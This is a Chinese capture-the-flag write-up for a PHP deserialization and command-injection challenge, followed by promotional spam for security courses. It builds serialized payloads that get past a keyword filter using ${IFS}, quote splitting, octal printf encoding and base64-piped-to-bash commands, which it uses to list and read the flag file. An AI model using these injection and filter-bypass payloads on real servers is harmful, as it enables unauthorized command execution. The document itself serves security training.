2024年最全攻防世界Web题 - unseping 总结_unseping攻防世界(1)

    if (in_array($this->method, array("ping"))) {  //判断method变量是否等于"ping"
        //用一个数组作为参数调用一个回调函数,返回值为回调函数执行的结果或者为false。
        call_user_func_array(array($this, $this->method), $this->args);  
    }
} 

function ping($ip){
    exec($ip, $result);//执行系统命令
    var_dump($result);
}

function waf($str){
    if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {//过滤匹配
        return $str;
    } else {
        echo "don't hack";
    }
}

function __wakeup(){ //反序列化时自动调用
    foreach($this->args as $k => $v) { //遍历数组
        $this->args[$k] = $this->waf($v); //调用waf函数过滤数组中的所有值
    }
}   

}

$ctf=@$_POST[‘ctf’]; //接受POST参数ctf
@unserialize(base64_decode($ctf)); //对ctf参数进行base64解码
?>

### 3、构建调用链



> 
> 
> ```
> base64编码后的序列化字符串 >> unserialize() >> __wakeup() >> waf() >> __destruct() >> ping()
> ​
> 通过对源代码的分析，我们可以得出以下几点：
> 1、序列化字符串需要进行base64编码
> 2、私有变量 method="ping"
> 3、私有变量 args 是一个数组
> ​
> 涉及函数作用：
> 1、unserialize()  反序列化
> 2、__wakeup()     反序列化自动调用
> 3、__construct()  构建对象的时被调用,反序列化时不会调用该方法
> 4、__destruct()   明确销毁对象或脚本结束时被调用；
> 5、preg_match_all()        执行一个全局正则表达式匹配。
> 6、call_user_func_array()  调用回调函数，并把一个数组参数作为回调函数的参数
> ```
> 
> 


### 4、解题过程


构建序列化字符串：

<?php class ease{ private $method; //私有变量 private $args; function __construct($method,$args) { //创建对象时自动调用 $this->method = $method; //给私有变量赋值 $this->args = $args; } } //1、获取当前目录下的文件 $e = new ease("ping", array('l""s${IFS}-l')); echo base64_encode(serialize($e)); //执行后，获得当前目录下存在目录：flag_1s_here //2、获取 flag_1s_here 目录下的文件 $e = new ease("ping", array('l""s${IFS}-l${IFS}fl""ag_1s_here')); //获取当前目录下的文件 echo base64_encode(serialize($e)); //执行后，获得 flag_1s_here 目录下存在文件 flag_831b69012c67b35f.php，浏览器访问后没有反应，说明只能查看该文件 //3、查看flag_831b69012c67b35f.php文件的内容，因为 /、;、|、& 都已经被过滤了，这里采用8进制绕过 //把 cat flag_1s_here/flag_831b69012c67b35f.php 转为8进制如下："\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160" $a = array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'); $e = new ease("ping", $a); echo base64_encode(serialize($e)); //获取到flag：array(2) { [0]=> string(5) " string(47) "//$cyberpeace{e922462a49effa0bc1ac5410d01a89d2}" } ``` ### 5、绕过技巧说明 1. **linux下绕过空格技巧**（因为空格被过滤，所以需要绕过空格） > > > ``` > ${IFS}：在linux下，${IFS}是分隔符的意思，所以可以有${IFS}进行空格的替代。 > $IFS$9：$起截断作用，9为当前shell进程的第九个参数，始终为空字符串，所以同样能代替空字符串进行分割。 > $IFS$1 > <：>>和>都属于输出重定向，<属于输入重定向。 > <> > {,} > ``` > > 2. **关键字绕过** > > > ``` > Base64编码绕过： > echo MTIzCg==|base64 -d //打印123，MTIzCg==是123的base64编码 > echo "Y2F0IC9mbGFn"|base64 -d|bash //执行cat /flag > echo "bHM="|base64 -d|sh       //将执行ls > ​ 还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！ 王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。 对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！ 【完整版领取方式在文末！！】 ***93道网络安全面试题***    内容实在太多，不一一截图了 ### 黑客学习资源推荐 最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！ 对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。 #### 1️⃣零基础入门 ##### ① 学习路线 对于从来没有接触过网络安全的同学，我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**，大家跟着这个大的方向学习准没问题。  ##### ② 路线对应学习视频 同时每个成长路线对应的板块都有配套的视频提供：  **网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。** **[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)** **一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**